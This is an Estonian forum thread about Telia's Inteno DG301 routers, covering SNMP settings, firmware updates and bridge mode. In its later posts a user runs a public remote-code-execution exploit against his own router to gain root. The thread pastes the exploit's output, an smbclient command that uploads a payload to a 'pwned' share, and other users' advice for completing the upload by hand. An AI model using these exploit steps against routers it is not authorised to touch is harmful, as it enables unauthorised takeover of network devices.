|
Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
| autor |
|
Tomorrow
HV Guru

liitunud: 08.02.2006
|
|
| Kommentaarid: 92 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
82 |
|
| tagasi üles |
|
 |
XeStAiSy
Aeg Maha 2a
liitunud: 12.12.2001
|
09.01.2018 10:54:12
|
|
|
Saavad rohem nuruda näe meil premium klassi ruuter premium nuppudega. Igatahes mul hakkab see preemiumi mull suunurkasid kiskuma.
Voi ostad preemium klassi ruuteri mis tegelikult dumbled down.
_________________ Punktkeevitus patareidele/akudele. Akutrelli/laptopi/e-bike. PM |
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
11 |
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
09.01.2018 11:49:53
|
|
|
| Reaper kirjutas: |
| Etz kirjutas: |
| Reaper kirjutas: |
Palun abi SNMP tööle saamiseks Inteno DG301 ruuteris.
Varem mul ikka töötas, ka peale automaatset firmware uuendust sain alati tööle.
Aga nüüd Telia on mingi täiesti teise GUI-ga firmware pannud ruuteritesse.
Ja no tee või tina, ei saa enam SNMP tööle, ei vasta snmpwalk päringule...
Firmware on: DG301-W7P2U_ELION3.11.6-170626_0111 |
Jõuan koju, saadan PS'i ja vaatame...  |
Tänud Etz-ile, tema abiga sain SNMP jälle tööle.
Juhul kui kellelgi veel probleem on, siis paneme siia ka kirja:
Spoiler 
Asi selles, et SNMP alajaotuses on kiri Enabled - kas siis, kui teenus disabletud on!
Ja paremal ääres on vaevumärgatav valge nupp valgel taustal, mida tuleb vajutada.
Kes sellise kasutajaliidese disainis, tuleks küll kooli tagasi saata, värvikontraste õppima! |
Juhul kui kellegi on probleem, paneme kirja?
Kas see on probleem või trükiviga?
Ma usun, et keskmine eesti HV kasutaja saab vigasest tekstist aru ja näeb ka nuppe.
Mõte on Enable (mitte "d") see kiri ei muutu menüüs kunagi, aktiivne on vaid nupp.
Hetkel pole sarnase menüüga intenot käes aga näide DG400 Primest.
ps DG301 ja DG200 pole premium.
|
|
| Kommentaarid: 262 loe/lisa |
Kasutajad arvavad: |
   |
:: |
2 :: |
0 :: |
228 |
|
| tagasi üles |
|
 |
Etz
HV Guru

liitunud: 27.01.2005
|
09.01.2018 11:52:42
|
|
|
indrekp, probleem pole konkreetselt Intenos või Telias, pole tarvis kohe dzotile viskuda, Jucis on ka palju muid asju, mis on raskesti märgatavad või kehvasti lahti seletatud.
Kuna Juci on opensource, siis alati võite omapoolseid parandusi submittida: https://github.com/mkschreder/juci
_________________ ...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen! |
|
| Kommentaarid: 236 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
196 |
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
09.01.2018 13:27:32
|
|
|
Etz, Sul on sulaselge õigus, probleem polegi Intenos või Telias ja pole vaja madratsile viskuda (minu isiksus ei lömita kellegi ees, ütlen mida arvan).
Probleem on kasutajas, kui ta ei suuda enam oma peaga mõelda, et menüüs on trükiviga kuid siiski nupp on olemas kus vajalik funktsioon (de)aktiviseerida.
Viitan lihtsalt probleemile, nii nagu pildiga algselt viidati, et tekst on vale.
|
|
| Kommentaarid: 262 loe/lisa |
Kasutajad arvavad: |
   |
:: |
2 :: |
0 :: |
228 |
|
| tagasi üles |
|
 |
neonsea
HV vaatleja

liitunud: 13.07.2017
|
09.01.2018 17:01:47
|
|
|
| Järgmises neonWRT's on JUCI'l tume theme, isiklikult ei meeldi hetkene JUCI color scheme.
|
|
| Kommentaarid: 1 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
0 |
|
| tagasi üles |
|
 |
tahanteada
Lõuapoolik

liitunud: 04.04.2003
|
09.01.2018 17:51:17
|
|
|
| indrekp kirjutas: |
Etz, Sul on sulaselge õigus, probleem polegi Intenos või Telias ja pole vaja madratsile viskuda (minu isiksus ei lömita kellegi ees, ütlen mida arvan).
Probleem on kasutajas, kui ta ei suuda enam oma peaga mõelda, et menüüs on trükiviga kuid siiski nupp on olemas kus vajalik funktsioon (de)aktiviseerida.
Viitan lihtsalt probleemile, nii nagu pildiga algselt viidati, et tekst on vale. |
Ääremärkusena: See "salapärane kiri" Enabled ei pea olema trükiviga.
Tehnilises inglise keeles tähendab see hetkel pigem hoopis seda, et:
1. See paremal pool asuv "lüliti" on tehtud aktiivseks ja seetõttu saab kasutaja seda "lülitit lülitada".
2. Ja et kusagil mujal paneelis, näiteks Adminni all vms. on eraldi "kirje" millest selle "lüliti" saab muuta "nähtamatuks / viia seisu kus kasutaja seda "lülitit" mingil juhul lülitada ei saa.
PS: Paljudel juhtudel-programmides ongi väga tihti nii, et igasugu "lülitid" pannakse esmalt paika ja alles siis hakatakse neid "lülitama".
|
|
| Kommentaarid: 284 loe/lisa |
Kasutajad arvavad: |
   |
:: |
2 :: |
11 :: |
211 |
|
| tagasi üles |
|
 |
Reaper
Kreisi kasutaja

liitunud: 29.08.2005
|
10.01.2018 13:25:38
|
|
|
| indrekp kirjutas: |
Etz, Sul on sulaselge õigus, probleem polegi Intenos või Telias ja pole vaja madratsile viskuda (minu isiksus ei lömita kellegi ees, ütlen mida arvan).
Probleem on kasutajas, kui ta ei suuda enam oma peaga mõelda, et menüüs on trükiviga kuid siiski nupp on olemas kus vajalik funktsioon (de)aktiviseerida.
Viitan lihtsalt probleemile, nii nagu pildiga algselt viidati, et tekst on vale. |
Viga polegi Telias vaid selle ruuteri kasutajaliidese disaineris. Disabled krt olgu punane!
Telia viga võib-olla ainult niipalju, et ta just selle nõmeda disaini valis.
Fakt on see, et ma raiskasin mitmel päeval kokku mitu tundi üritades seda tööle saada! Vihale ajab...
|
|
| Kommentaarid: 29 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
27 |
|
| tagasi üles |
|
 |
Linnukas
HV vaatleja
liitunud: 25.09.2017
|
11.01.2018 02:58:46
|
|
|
Valge vaevumärgatav nupuke saab niipalju tähelepanu.
Ootan ka ise huviga hämarat/tumetamat themet.
Tuttav ütles, et rumalaid küsimusi pole olemas, on rumalad vastused, seega teen proovi. Openwrt-l on vanematel versioonidel gui-s olemas package manager, kas uutel üldse on mingeid packageid mida saab installida
tunnen eriti puudust reklaami või vähemalt lingiblokeerijast (mida ma ka vanadel versioonidel tööle ei saanudki) Prooviks uuesti.
|
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
11.01.2018 03:04:18
|
|
|
| Linnukas, see ei ole puhas openwrt.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
zlluvhaj
HV vaatleja
liitunud: 11.01.2018
|
19.01.2018 15:01:58
|
|
|
| Kas Inteno DG301 on võimalik bridgeks muuta?
|
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
19.01.2018 15:23:10
|
|
|
Erakliendile sellist võimalust ei pakuta, et vajuta nuppu on bridge.
| neonsea kirjutas: |
| GuidoS kirjutas: |
Võimalik et rumal küsimus, aga kas alternatiivse fw abil saab Inteno DG301A-R1 teha bridgeks? Tahaks oma seadme ruutima-firewallima panna.
Täna esimest päeva Telia eraklient, seni ainult ärikliendina ja ei osanud oodata, et koju lihtsalt ei saa sellist häälestust. |
Kui käsurida ei karda, siis on kõik võimalik.
https://wiki.openwrt.org/doc/recipes/bridgedap |
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
zlluvhaj
HV vaatleja
liitunud: 11.01.2018
|
19.01.2018 17:54:20
|
|
|
| KillFrenzy kirjutas: |
Erakliendile sellist võimalust ei pakuta, et vajuta nuppu on bridge.
| neonsea kirjutas: |
| GuidoS kirjutas: |
Võimalik et rumal küsimus, aga kas alternatiivse fw abil saab Inteno DG301A-R1 teha bridgeks? Tahaks oma seadme ruutima-firewallima panna.
Täna esimest päeva Telia eraklient, seni ainult ärikliendina ja ei osanud oodata, et koju lihtsalt ei saa sellist häälestust. |
Kui käsurida ei karda, siis on kõik võimalik.
https://wiki.openwrt.org/doc/recipes/bridgedap |
|
käsureale pääseb ka stock Telia firmware'ga? vabandust kui väga loll küsimus..
|
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
d_m
HV kasutaja
liitunud: 24.08.2002
|
13.03.2018 17:33:07
|
|
|
| indrekp kirjutas: |
| KillFrenzy kirjutas: |
Mismoodi sellele uue firmware saab, praegu mingi iidne DG301-W7P2U_ELION2.3.11RC1-140422_1519
See 5sek reset all hoidmine, vilgutab tulesi ja kui üles tuleb siis interneti enam ei saa, telia lehele vahest ainult.
Iseteenindus kirjutab ka et ruuteriga ei saa ühendust. Kuigi sisevõrgu seadmed on näha. Ja ruuteri logist ja ka root logib sisse. |
Juba mõnda aega saab nii vanu softe uuendada vaid helpdeski abiga. Täpselmalt siis neid mille soft on ala 3.4.0 versiooni.
Kõne 123 ja lastakse peale. |
Saan siis nii aru, et ala=alla , st kui on vanem versioon kui 3.4.0, siis neid saab vaid Telia helpdeski abiga uuendada?
Ka endal on üks ruuter veel vana softiga "DG301-W7P2U_ELION2.3.11RC1-140422_1519"
|
|
| Kommentaarid: 10 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
7 |
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
13.03.2018 19:48:52
|
|
|
| d_m, jah, kui automaatselt peale resetti ei uuenda siis kõne ja pannakse uuendama jõuga.
|
|
| Kommentaarid: 262 loe/lisa |
Kasutajad arvavad: |
   |
:: |
2 :: |
0 :: |
228 |
|
| tagasi üles |
|
 |
siven
HV veteran

liitunud: 04.12.2005
|
14.03.2018 10:40:53
|
|
|
| praegu endal see dg200a vist oli kavatsen selle välja osta .aga küsimus kas selle sama ruuteriga tuleviku see VDSL plus ka töötab?
|
|
| Kommentaarid: 163 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
149 |
|
| tagasi üles |
|
 |
jägaja
HV Guru

liitunud: 06.08.2004
|
14.03.2018 10:44:16
|
|
|
ei tööta, selleks on uut ruuterit vaja, mida pole veel Telial pakkuda.
_________________ " Maailm on täis kõikvõimalike külatarkade kogukondi, kelle ühine joon on teadus- ja tõenduspõhisele elukäsitusele vastandumine." |
|
| Kommentaarid: 145 loe/lisa |
Kasutajad arvavad: |
   |
:: |
1 :: |
0 :: |
130 |
|
| tagasi üles |
|
 |
Dijital
HV Guru

liitunud: 09.06.2003
|
14.03.2018 13:07:23
|
|
|
Kas Telial on mingit lojaalsus-programmi ka, et kui oled X aastat juba seda aparaati rentinud ja aparaadi maksumus juba ammu tasutud, siis mingi hetk saad selle omale ja enam renti ei pea maksma?
_________________ OBSBOT veebipoe affiliate link / 5% sooduskood: TUIKOTREW
Müüa uus Agon by AOC 610Hz monitor AG246FK6 |
|
| Kommentaarid: 41 loe/lisa |
Kasutajad arvavad: |
   |
:: |
1 :: |
0 :: |
32 |
|
| tagasi üles |
|
 |
d_m
HV kasutaja
liitunud: 24.08.2002
|
14.03.2018 13:09:18
|
|
|
| indrpo kirjutas: |
| d_m, jah, kui automaatselt peale resetti ei uuenda siis kõne ja pannakse uuendama jõuga. |
Telia abiga uuendus kenasti tehtud.
Nüüd näitab versiooniks "DG301-W7P2U_ELION3.11.6-170626_0111"
|
|
| Kommentaarid: 10 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
7 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
14.03.2018 13:35:10
|
|
|
| Dijital, ei. Teatud juhtudel on kõige odavam peale paari aastat rent lõpetada, seadet mitte tagasi viia ja trahv maksta.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
bladerunner
HV Guru
liitunud: 17.01.2002
|
14.03.2018 14:20:52
|
|
|
Kunagi ma mäletan oli DG301-l probleem sellega kui Wifi interface päris maha kustutada seadistustest.
Aga kui tema Wifi lihtsalt ära keelata? Iseeneseslikult tagasi ei aktiveerita seda Telia poolt (võimalike) uuenduste käigus?
Mõtlesin et panen hoopis Mikrotiku omale elutuppa Wifi jagajaks. Mul seal hetkel miski dummy switch, saaks ühe karbikesega kohe kaks asja lahendatud.
_________________ Experience is what you get when you don't get what you want. |
|
| Kommentaarid: 169 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
158 |
|
| tagasi üles |
|
 |
jägaja
HV Guru

liitunud: 06.08.2004
|
14.03.2018 15:08:04
|
|
|
Seda saladuslikku Inteno wifi aktiverumist on ka arutletud, et kuidas ja mismoodi see ise juhtub.
Sa ikka tead, et Mikrotikus on juba hulga aastaid (2012 aastast vististi) olnud salauks, mis alles nüüd avastati. Lapitud veel vist pole.
Nüüd aga on ka muud ruuterite ja switchide tootjad luubi all, et kus veel selline "lahendus" kasutusel on.
https://www.engadget.com/amp/2018/03/11/sophisticated-malware-attacks-through-routers/
| tsitaat: |
| It's likely the creation of a government surveillance agency. |
_________________ " Maailm on täis kõikvõimalike külatarkade kogukondi, kelle ühine joon on teadus- ja tõenduspõhisele elukäsitusele vastandumine." |
|
| Kommentaarid: 145 loe/lisa |
Kasutajad arvavad: |
   |
:: |
1 :: |
0 :: |
130 |
|
| tagasi üles |
|
 |
bladerunner
HV Guru
liitunud: 17.01.2002
|
14.03.2018 17:20:51
|
|
|
| jägaja kirjutas: |
Seda saladuslikku Inteno wifi aktiverumist on ka arutletud, et kuidas ja mismoodi see ise juhtub.
Sa ikka tead, et Mikrotikus on juba hulga aastaid (2012 aastast vististi) olnud salauks, mis alles nüüd avastati. Lapitud veel vist pole.
Nüüd aga on ka muud ruuterite ja switchide tootjad luubi all, et kus veel selline "lahendus" kasutusel on.
https://www.engadget.com/amp/2018/03/11/sophisticated-malware-attacks-through-routers/
| tsitaat: |
| It's likely the creation of a government surveillance agency. |
|
jägaja, mäh? Lugesid ikka oma lingi ja algallika läbi?
Ma ei leidnud ühegi viidet "salauksele" (backdoor). Küll aga võimalikule turvaaugule mis juba aasta tagasi parandatud!
>> up to RouterOS version 6.38.4 was vulnerable for injecting unwanted software into a PC.
>> What's new in 6.38.5 (2017-Mar-09 11:32)
| tsitaat: |
| ... attack also required the router's firewall to be disabled, which would otherwise be on by default. "This did not affect many devices," a MikroTik spokesperson wrote in an email to WIRED. "Only in rare cases would somebody misconfigure their device." |
Üldiselt kisub juba OT-ks kätte...
_________________ Experience is what you get when you don't get what you want. |
|
| Kommentaarid: 169 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
158 |
|
| tagasi üles |
|
 |
jägaja
HV Guru

liitunud: 06.08.2004
|
14.03.2018 17:39:06
|
|
|
| ot: |
bladerunner, ma ei väida et tegu on just salauksega, neid pahalaste termineid ei jõua lihtsalt kokku lugeda, kuid soovimatu ligipääs sinu võrgule pole ka soovitud ometi.
Ise koperdasin paar päeva tagasis elle uudise otsa, oli millegipärast mulle ette söödetud, arvasin, et hiljutine sündmus.
Muidu aga, kes julgeb väita igapäevate tõsisete turvariskide ilmsikstuleku valguses , et internetti ühendatud seadmed pole kellegi kolmanda osapoole poolt hallatavad ega jälgitavad?
Muidugi, suvalist Matit ei jälgita, selleks puudub ressurss, kuid seda asjasthuvitatud harratavad laialdaselt.
|
Inteno WiFisse see muidugi ei puutu.
| tsitaat: |
Muidu aga viidatakse ka siin tollele Slingshotile ja tuuakse võrdlusekspahavara, kui backdoor
| tsitaat: |
According to Ars Technica, the sophistication of Slingshot rivals similarly advanced malware apps, including Regin, a backdoor that infected Belgian telco Belgacom and other targets for years, and Project Sauron, a separate malware that also remained hidden for years.
http://bgr.com/2018/03/12/slingshot-malware-routers-infected-pcs/ |
|
| ot: |
| Huvitav, et enamus neid allikate viiteid on mõni päev vanad, sinu toodud link tundmatust allikast aga kannab aastanumbrit 2017??? |
| bladerunner kirjutas: |
>> up to RouterOS version 6.38.4 was vulnerable for injecting unwanted software into a PC.
>> What's new in 6.38.5 (2017-Mar-09 11:32)
| tsitaat: |
| ... attack also required the router's firewall to be disabled, which would otherwise be on by default. "This did not affect many devices," a MikroTik spokesperson wrote in an email to WIRED. "Only in rare cases would somebody misconfigure their device." |
Üldiselt kisub juba OT-ks kätte... |
Aga see on juba internetiturvalisuse ja seadmete turvalisuse teema tõesti.
_________________ " Maailm on täis kõikvõimalike külatarkade kogukondi, kelle ühine joon on teadus- ja tõenduspõhisele elukäsitusele vastandumine." |
|
| Kommentaarid: 145 loe/lisa |
Kasutajad arvavad: |
   |
:: |
1 :: |
0 :: |
130 |
|
| tagasi üles |
|
 |
bladerunner
HV Guru
liitunud: 17.01.2002
|
14.03.2018 17:46:37
|
|
|
| ot: |
jägaja, kõik õige, Slingshot'st hakati rääkima paar päeva tagasi aga see turvaauk, mis väidetavalt võimaldas Slingshotil end paigaldada, lapiti ära Mikrotik poolt juba 09. märts 2017.
https://www.wired.com/story/router-hacking-slingshot-spy-operation-compromised-more-than-100-targets/
| tsitaat: |
| ... while Kaspersky's researchers haven't yet determined how the spyware initially infected the majority of those targets, in some cases the malicious code had been installed via small-business-grade routers sold by the Latvian firm MikroTik, which the Slingshot hackers had compromised. |
|
_________________ Experience is what you get when you don't get what you want. |
|
| Kommentaarid: 169 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
158 |
|
| tagasi üles |
|
 |
indrpo
HV Guru
liitunud: 14.11.2004
|
14.03.2018 19:44:48
|
|
|
| siven kirjutas: |
| praegu endal see dg200a vist oli kavatsen selle välja osta .aga küsimus kas selle sama ruuteriga tuleviku see VDSL plus ka töötab? |
nii ja naa. võimalik, et Telia kasutab koos uute ruuteritega ja vectoringiga olemasolevate intenode 17a protokolli maksimumi ära seega 100/20 paketti saab kenasti ka praeguste ruuteritega tarbida, kui heas kaablis ja õigel kaugusel oled ning jaam toetab.
seda näeb siis kui uued teenused turul.
klient saab üüriruuterit alati vahetada, see pole probleem.
üüriga ei saa seade kunagi kinni makstuks, see on garantii, vahetamise ja seadme amortisatsiooni tasu, samal ajal pole siduvat lepingut, täna võtad, homme tagastad kui vaja. tahad osta, vali ostuvõimaluste hulgast, tahad üüri mingi aeg lõpetada ja seadet omastada, lõpeta trahviga.
disabled inteno wifi seadistus salvestatakse Telias varukonfis seega ei tohiks ta kunagi hiljem aktiviseeruda.
oma AP kasutamine on lihtne ja lubatud, mul ruuter sahvris ja elutoas tv kapis 1cat5e mille küljes zyxel armor millel neli lan pesa, meedia vidinad selle küljes, digiboks küll eraldi kaabliga aga võiks vabalt ka samasse apsse pista.
|
|
| Kommentaarid: 262 loe/lisa |
Kasutajad arvavad: |
   |
:: |
2 :: |
0 :: |
228 |
|
| tagasi üles |
|
 |
XeStAiSy
Aeg Maha 2a
liitunud: 12.12.2001
|
23.03.2018 08:59:11
|
|
|
Mõni aeg möödunud ilmselt see voice teema on ajalukku visatud ja ei toimi sortsust saadud firmwarega?
_________________ Punktkeevitus patareidele/akudele. Akutrelli/laptopi/e-bike. PM |
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
11 |
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 15:36:58
|
|
|
Kas keegi on suutnud DG301-W7P2U_ELION3.11.6-170626_0111 softiga ruuterile selgeks teha, et management toimiks vaid https -ga ja http on kinni? Ja, et saaks manageerida ka interneti suunalt teatud ip pealt?
Mina https aktiveerimist ei leidnud? Ok, kindla src ip pealt võiks ka http lubada, seega lubasin müüris välise src ip pealt > ruuteri välise ip peale 80 pordi. Väljast ligi ikka ei saa. Siis proovisin sellesama lubatud pordi suunamist edasi ruuteri sisemise ip ja pordi 80 peale. Väljast ligi ei saa. Kui lubada dmz > ruuteri sisemise ip peale, siiis on avatud väljast any:any ruuteri sisemise ip peale ligipääs.
Mälu järgi vanemas softis oli näha ka default tulemüüri reegleid. Uues seda valikut ei leia. Käsureale ka ei saa. Mida veel teha?
EDIT: https -i toeta see ruuter. Ja kuigi on enda seade, ei anna nad root ligipääsu, seega tuleb kas leida sobiv exploit või mingi teine ruuter.
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
02.04.2018 16:39:57
|
|
|
| ksuuk, samas teemas on alternatiivne fw olemas. Ja korduvalt ka juttu olnud rooti saamisest.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 17:04:46
|
|
|
| KillFrenzy kirjutas: |
| ksuuk, samas teemas on alternatiivne fw olemas. Ja korduvalt ka juttu olnud rooti saamisest. |
Mõtled root -i selle meetodiga - https://neonsea.uk/blog/2017/12/23/rce-inteno-iopsys.html
Proovisin, see ei tööta:
Authenticating...
Got key: xxxx
Adding Samba share...
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
Traceback (most recent call last):
File "./inteno", line 126, in <module>
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
AttributeError: 'module' object has no attribute 'run'
Ja milline alternatiivne firmware võiks stable olla?
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 18:12:19
|
|
|
Tänud, Ruuter pakub vaid netti, ei midagi muud. Enne peab vaid MAC -i salvestama, et hiljem väline IP Telia DHCP -st saada.
Kuid kõigepealt oleks vaja root ligipääs saada. Kas keegi on selle scriptiga ja DG301-W7P2U_ELION3.11.6-170626_0111 firmwarega root accessi saanud?
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
02.04.2018 18:17:20
|
|
|
| ksuuk, ega mac ei muutu siis.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 18:21:30
|
|
|
| KillFrenzy kirjutas: |
| ksuuk, ega mac ei muutu siis. |
Oleneb firmwarest, mõnel on MAC hardcoded ja kirjutatakse flashimisel üle. :(
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
02.04.2018 18:53:44
|
|
|
Proovi uuema Pyhtoniga (vähemalt 3.5). Alla Python 3.5 subprocess.run() funktsiooni ei eksisteeri.
| ksuuk kirjutas: |
| KillFrenzy kirjutas: |
| ksuuk, samas teemas on alternatiivne fw olemas. Ja korduvalt ka juttu olnud rooti saamisest. |
Mõtled root -i selle meetodiga - https://neonsea.uk/blog/2017/12/23/rce-inteno-iopsys.html
Proovisin, see ei tööta:
Authenticating...
Got key: xxxx
Adding Samba share...
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
Traceback (most recent call last):
File "./inteno", line 126, in <module>
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
AttributeError: 'module' object has no attribute 'run'
Ja milline alternatiivne firmware võiks stable olla? |
|
|
| Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
55 |
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 20:28:48
|
|
|
| Adebisi kirjutas: |
| Proovi uuema Pyhtoniga (vähemalt 3.5). Alla Python 3.5 subprocess.run() funktsiooni ei eksisteeri. |
Uuendasin:
which python3.6
/usr/bin/python3.6
Uus veateade:
Authenticating...
Got key: xxx
Adding Samba share...
Samba share seems to already exist, skipping
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
/bin/sh: 1: smbclient: not found
Traceback (most recent call last):
File "./inteno", line 127, in <module>
shell=True, check=True)
File "/usr/lib/python3.6/subprocess.py", line 418, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command 'smbclient \\\\192.168.1.1\\pwned p -c 'put /root/.payload.tmp pwn.sh'' returned non-zero exit status 127.
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
02.04.2018 20:36:32
|
|
|
| see vbl ära ka parandatud vahepeal. kirjuta autorile.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
02.04.2018 21:36:07
|
|
|
| smbclient puudu. Ubuntu ja Debianiliste puhul terminali: sudo apt install smbclient
|
|
| Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
55 |
|
| tagasi üles |
|
 |
seeru
HV veteran
liitunud: 10.02.2004
|
03.04.2018 08:29:22
|
|
|
| KillFrenzy kirjutas: |
Tagasi telia fw peale ei saa. Niiet omal vastutusel.
|
Kui vaja, siis saab tagasi ka ikka.
|
|
| tagasi üles |
|
 |
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
03.04.2018 10:11:28
|
|
|
| Adebisi kirjutas: |
| smbclient puudu. Ubuntu ja Debianiliste puhul terminali: sudo apt install smbclient |
Scripti omanik märkas ka seda, tõepoolest, minimal debiani selleks installisin, lasin nüüd ka smbclient -i sisse, aga siiski kaugemale ei saa, tundub, et see auk on suletud. Mida veel teha?
root@debian:~# ./inteno
Authenticating...
Got key: xxx
Adding Samba share...
Samba share seems to already exist, skipping
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_LOGON_FAILURE
Traceback (most recent call last):
File "./inteno", line 127, in <module>
shell=True, check=True)
File "/usr/lib/python3.6/subprocess.py", line 418, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command 'smbclient \\\\192.168.1.1\\pwned p -c 'put /root/.payload.tmp pwn.sh'' returned non-zero exit status 1.
root@debian:~# which smbclient
/usr/bin/smbclient
|
|
| Kommentaarid: 3 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
3 |
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
03.04.2018 10:39:22
|
|
|
| seeru kirjutas: |
| KillFrenzy kirjutas: |
Tagasi telia fw peale ei saa. Niiet omal vastutusel.
|
Kui vaja, siis saab tagasi ka ikka. |
Räägi lähemalt.
|
|
| Kommentaarid: 151 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
133 |
|
| tagasi üles |
|
 |
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
03.04.2018 12:08:52
|
|
|
ksuuk, vaata kas niisama pääsed sambasharele ligi.
Kas siis failihaldurikaudu smb://192.168.1.1/pwned
või terminalis:
smbclient \\\\192.168.1.1\\pwnded
|
Kui sisse laseb siis saad selle faili üles laadida:
put /root/.payload.tmp pwn.sh
exit |
Kui sinna pwnded kausta õnnestub ligi saada ja faile tekitada siis võid selle scripti tekitatud faili käsitsi sinna kopeerida ja pwn.sh'ks ümber nimetada. Py koodist pead peale seda muidugi
| subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path), shell=True, check=True) |
selle eemaldama.
Mis ruuteritarkvara versioon muidu on?
|
|
| Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
1 :: |
55 |
|
| tagasi üles |
|
 |
seeru
HV veteran
liitunud: 10.02.2004
|
03.04.2018 17:28:01
|
|
|
| KillFrenzy kirjutas: |
| seeru kirjutas: |
| KillFrenzy kirjutas: |
Tagasi telia fw peale ei saa. Niiet omal vastutusel.
|
Kui vaja, siis saab tagasi ka ikka. |
Räägi lähemalt. |
Lased uuesti Telia firmware peale.
|
|
| tagasi üles |
|
 |
KillFrenzy
HV Guru

liitunud: 05.04.2003
|
03.04.2018 17:28:25
|
|
